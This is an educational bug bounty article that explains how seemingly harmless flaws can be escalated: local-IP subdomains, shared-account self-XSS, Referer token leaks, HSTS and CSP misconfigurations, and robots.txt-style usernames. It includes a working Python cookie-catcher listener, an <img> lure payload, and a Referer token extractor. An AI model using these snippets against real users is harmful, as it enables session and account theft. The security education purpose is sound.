Bug bounty programs (vendors' vulnerability reward programs) are becoming more and more widespread. Sometimes a vulnerability search turns up areas that look evidently insecure (e.g., self-XSS) but whose threat is hard to prove. Yet the larger (or simply the smarter) the vendor is (e.g., Google), the more willing it is to discuss the report, reproduce the indicated vulnerability, and pay a reward if it is confirmed. This article is a collection of such tricky situations and of ways to prove the threat and make the Internet a bit more secure.
The vulnerability lies in DNS records for a domain's subdomains that point to addresses on the local network.
Let's suppose that while enumerating subdomains we've found something like local.target.com, which resolves to 127.0.0.1 (or simply to an IP from the local network).
Let's consider the case when the subdomain points to 127.0.0.1. Imagine an organization that works through thin clients, so that its employees all work on one and the same machine, which each of them sees as the IP address 127.0.0.1. In this case, the intruder can be a local user of the system. To attack, the intruder binds a port in the upper range, e.g., 10024 (since the lower ports require elevated privileges). Then the intruder sends the victim (another user of the same system) an email that loads resources from the vulnerable subdomain, which in turn points to the local IP, e.g.,
<img src="http://local.target.com:10024/">. Once the victim opens the mail and the image is requested from *.target.com, the intruder receives the victim's cookies on the thoughtfully opened listener, be it a wireless sniffer or netcat. One little trick: such systems often also run the CUPS printing service (for printers), whose web interface contains many XSSes. Thanks to that, even a remote intruder can profit from a subdomain mistakenly pointing to a local address, for example, by making the user follow a link to one of those vulnerable CUPS pages.
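The local attacker's side of this trick can be sketched in a few lines. This is a minimal, hypothetical illustration (the port 10024 comes from the text; everything else is invented): a small HTTP listener bound to an unprivileged high port that records the Cookie header of every incoming request, playing the role of the "thoughtfully opened" netcat.

```python
# Minimal sketch of the local attacker's cookie catcher (hypothetical;
# port 10024 is the high port mentioned in the text). It binds an
# unprivileged port and logs the Cookie header of each request.
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

captured = []  # cookies harvested from incoming requests

class CookieCatcher(BaseHTTPRequestHandler):
    def do_GET(self):
        captured.append(self.headers.get("Cookie", ""))
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(b"GIF89a")  # tiny fake "image" body

    def log_message(self, *args):  # keep the console quiet
        pass

def serve(port=10024):
    """Start the listener in a background thread and return the server."""
    server = HTTPServer(("127.0.0.1", port), CookieCatcher)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

When the victim's mail client renders `<img src="http://local.target.com:10024/">`, the browser attaches the `*.target.com` cookies to the request, and they end up in `captured`.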
If the subdomain points to a local-network IP, one can demonstrate the following vector: being in the same local network as the victim, occupy the IP address the subdomain points to and ask the user to follow the link.
Szymon Gruszecki earned $100 in HackerOne's own bug bounty for such a find (report 1509).
Google and self-XSS
Continuing with self-XSS attacks, I'd like to draw your attention to Google as one of the most generous companies in terms of rewards for detected vulnerabilities. Depending on the Google service, almost any self-XSS vector can be considered a non-self one, because both Gmail and Google Analytics have a function that lets you share your own account with other users simply by entering their email. What immediately comes to mind is the story of an XSS in a file name in Analytics, which fired only against the user's own account. However, as mentioned above, this vector could be used against other users as well. Of course, the unnamed author of this find was rewarded.
User data leak — malicious referrers
The vulnerability is negligent handling of the user's sensitive data: session data exposed in GET queries, and similar leaks.
The current and most widespread version of the HTTP protocol includes a Referer header carrying the URL the user "came from". Just imagine: the user resets a password, receives an email, follows the link with the password-change token, and the password-change page embeds an image from another website (say, an xkcd.com comic on how to choose a good password). The request for that image will be sent... that's right, with a Referer value containing the password-reset token. As a result, the owner of the domain the content (e.g., an image) comes from can harvest password-change tokens and change the passwords faster than the users themselves. Such a find earned $100 on HackerOne.
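From the image host's point of view, harvesting the token is trivial. A minimal sketch, assuming a hypothetical reset URL of the form `https://site.com/password/reset?reset_token=...` (both the path and the parameter name are invented for illustration):

```python
# Sketch of what the third-party content host can do with the Referer
# header: the reset URL arrives verbatim, so the token (here assumed
# to live in a "reset_token" query parameter) can be parsed out of it.
from typing import Optional
from urllib.parse import urlparse, parse_qs

def token_from_referer(referer: str) -> Optional[str]:
    """Extract a password-reset token leaked via the Referer header."""
    query = parse_qs(urlparse(referer).query)
    return query.get("reset_token", [None])[0]
```

Every image request logged by the host's web server comes with such a Referer, so the tokens can be collected straight from the access log.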
Web Server Misconfiguration — insecure redirectors
The vulnerability lies in web-server configuration faults, in particular in the value of the Strict-Transport-Security header.
Generally, one shouldn't transmit sensitive data (passwords, card numbers, etc.) over plain HTTP; it's better to use HTTPS or, better yet, serve the whole resource over HTTPS. How does it usually happen? A user requests a website over HTTP, say http://site.com, and receives a response like this:
HTTP/1.1 302 Found
Server: nginx/1.2.4
Date: Mon, 28 Apr 2014 15:22:23 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3
Location: https://site.com/
This response redirects the user to the HTTPS version of the website, which prevents a man-in-the-middle attack. But an intruder who starts capturing traffic early enough can replace the server's response so that the user is never redirected to HTTPS. To prevent this, the Strict-Transport-Security header is used in the server's response. It tells the browser not to visit this resource over HTTP anymore but to use HTTPS, and specifies for how long this rule (HTTPS only) applies to the website. Let's imagine: a user visits a website for the first time from a risk-free environment (e.g., the home computer), where nobody tampers with the response, so the browser receives and remembers the header. Later the user visits the website from an insecure environment, e.g., a cyber cafe, where an intruder does "cut out" headers; the browser nevertheless goes straight to HTTPS, and the user stays safe. Now back to Bug Bounty: there was a resource with incorrect settings, where the header was sent only on the redirect from HTTP to HTTPS, and the duration of the rule was relatively short, 180 days. By the way, note that there is also a pre-shared list of websites that may only be visited over HTTPS (the HSTS preload list): goo.gl/KxrNtl.
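The browser-side logic of HSTS can be sketched as follows. Two details matter here (per RFC 6797): a conforming browser ignores a Strict-Transport-Security header received over plain HTTP, which is why sending it only on the HTTP-to-HTTPS redirect achieves nothing, and the max-age directive gives the pin duration in seconds (180 days is 15552000 seconds). The function below is a simplified illustration, not a full header parser:

```python
# A sketch of the browser-side HSTS rule (RFC 6797): the header is
# honored only when received over HTTPS, and max-age says how long
# (in seconds) the "HTTPS only" pin lasts.
def hsts_max_age(scheme: str, header: str) -> int:
    """Return the pin duration in seconds, or 0 if the header is ignored."""
    if scheme != "https":
        return 0  # HSTS sent over plain HTTP is ignored by browsers
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        if name.lower() == "max-age" and value.isdigit():
            return int(value)
    return 0
```

So for the misconfigured resource above, the header on the HTTP 302 response yields a pin of 0 seconds regardless of its max-age value.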
Misconfiguration — Content-Security-Policy — both exists and doesn’t exist
Vulnerability: the web application decides incorrectly which clients should receive the Content Security Policy rules.
The Content Security Policy (CSP) header is rather well known and is becoming more and more popular. It's sent in the web server's response and tells the browser which content may be loaded and from where (images and so on). It's mainly meant to mitigate the consequences of XSS attacks: with correct CSP rules, the sniffer mentioned above can no longer be fed content from your own website. But not all browsers support it, and sometimes developers decide not to send the header to a client whose browser doesn't support CSP. So they define a white list of browsers (in fact, a list of User-Agent values) that receive the header. As a result, we have the following problems:
- a response without the CSP header can be cached on the client side (e.g., on a proxy server) or on the server side, somewhere on intermediate cache servers. As a result, this response (without CSP) can be served to a user whose browser does support CSP;
- more and more Chromium-fork browsers are appearing, and their users can set their own User-Agent strings, which for obvious reasons are not on the white list.
As you can see, these situations lead to the case from the headline: CSP both exists and doesn't exist, even for browsers that support it. On HackerOne somebody was even rewarded for this kind of thing, though not everybody agrees it deserves one. Facebook, for example, has exactly this problem: they work with such white lists and don't send CSP to everyone (only to Chrome starting from version X, Firefox starting from version Y, but not between A1 and B1), because with a user base as large as Facebook's one has to think about compatibility (some Firefox versions have trouble with CSP); if you don't send the header, you don't lose users. They plan to drop this restriction in the future.
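The white-list logic and its blind spot can be sketched like this (a toy model; the browser names, version thresholds, and policy string are all invented for illustration, not Facebook's actual rules):

```python
# A toy model of the User-Agent white list described above: only
# browsers on the (illustrative) list get the CSP header at all.
import re

CSP = "default-src 'self'"

def csp_header_for(user_agent: str):
    """Return the CSP header value, or None if the UA is not whitelisted."""
    match = re.search(r"(Chrome|Firefox)/(\d+)", user_agent)
    if not match:
        return None  # unknown UA (e.g., a Chromium fork): no CSP sent
    browser, version = match.group(1), int(match.group(2))
    if browser == "Chrome" and version >= 25:
        return CSP
    if browser == "Firefox" and version >= 23:
        return CSP
    return None
```

A Chromium fork with its own User-Agent string gets None even though its engine supports CSP perfectly well, which is exactly the "exists and doesn't exist" case.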
Web Application Misconfiguration — insecure %username%
The vulnerability lies in the incorrect design of an application whose functionality allows an intruder to override the content of service files in the application's web directory.
The URL of a personal profile page is generated differently depending on the website. Mostly it's something like /users/username/, but sometimes the username directly follows the domain, e.g., http://example.com/username. Let's go further and assume that dots in the username are allowed... Then we can register a user with an unusual name like robots.txt and, perhaps, replace the content of the web-crawler rules file, letting crawlers index what they shouldn't! One needn't look far for an example: remember the SMS leak from the MegaFon website. Many similar situations are possible.
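The defense is a username check at registration time. A minimal sketch, assuming the site serves profiles at http://example.com/&lt;username&gt; (the reserved-name list and the allowed-character policy are illustrative, not exhaustive):

```python
# A sketch of the username check a site with /<username> profile URLs
# needs: reject names that collide with service files in the web root.
import re

RESERVED = {"robots.txt", "sitemap.xml", "favicon.ico",
            "crossdomain.xml", ".well-known"}

def username_is_safe(name: str) -> bool:
    """Reject reserved file names and anything with a dot in it."""
    if name.lower() in RESERVED:
        return False
    if "." in name:  # dots enable robots.txt-style collisions
        return False
    return bool(re.fullmatch(r"[a-z0-9_-]{3,30}", name, re.IGNORECASE))
```

Forbidding dots outright is the simplest policy; a site that must allow them should at least keep a deny-list of every well-known file name crawlers and browsers request from the root.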
As you can see, there are many different ways to exploit a bug that looks harmless at first sight. Much depends on one's understanding, experience, usage environment, and imagination :). I recommend keeping an eye on hackerone.com bugs, because many vulnerability reports are made public after they are closed. You can also read about full-path leaks through CSS files, about a missing SPF record on a domain and, consequently, the possibility to spoof sender addresses in email (since SMTP allows spoofing the sender address "by design"), and about many other equally interesting and slightly weird things :). Happy bug hunting!